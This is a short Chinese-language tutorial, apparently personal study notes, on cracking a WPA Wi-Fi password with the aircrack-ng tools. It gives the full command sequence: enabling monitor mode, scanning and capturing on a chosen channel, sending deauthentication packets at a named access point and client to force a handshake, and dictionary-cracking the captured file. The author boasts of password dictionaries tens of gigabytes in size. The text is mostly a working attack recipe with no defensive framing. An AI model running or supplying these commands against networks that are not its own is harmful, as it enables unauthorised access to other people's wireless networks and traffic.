wi-fi你通过手上现有的接收端,去搜索到其他他送端发送的信号,拿到手上之后,利用手上的工具和命令讲获取到的信号破解掉需要一个接受段,可以接受到发送的信号无线的加密类型杂合模式是为了手机到更多的信号a
.
wi-fi
你通过手上现有的接收端,去搜索到其他他送端发送的信号,拿到手上之后,利用手上的工具和命令讲获取到的信号破解掉
需要一个接受段,可以接受到发送的信号
无线的加密类型
杂合模式是为了手机到更多的信号
airmon-ng start wlan0 up
ifconfig 看到mon0 说明开启混杂模式成功
看开启了混杂模式的网卡收集到了哪些信号
airodump-ng mon0
<length: 8> 表示有8个字节 隐藏了ssid 这种的依然能够破解,以后说明、
BSSID:MAC地址
CH :表示信道
以bdqntest第一个信道为例
airodump-ng -w test.cap -c 6 mon0
-w 保存的数据包路径
-c 指定6信道
输入命令后如图下面的第二块也有一个BSSID,还有一个STATION(跟的是正在连接的客户端的MAC地址)
aireplay-ng -0 10 -a 52:BD:5F:1F:07:98 -c 0c:60:76:2F:57:26 mon0
-0 发包次数,即进行注入***
-a ap的mac
-c 客户端的mac
开一个窗口慢慢抓的,一边抓,一边打
ls 可以看到 每次抓到的包,第一次命名成01第二回命名成02。。。。。
***到出正在抓包的那个窗口的右上角出现wpa handshake:52:BD:5F:1F:07:98 表示抓握手包成功
aircrack-ng -w 1.txt test*.cap
-w 指定字典
后面指定***的包文件
输入9回车
然后就开始破解了,字典要给力,我这里的都搞的几十G的密码字典
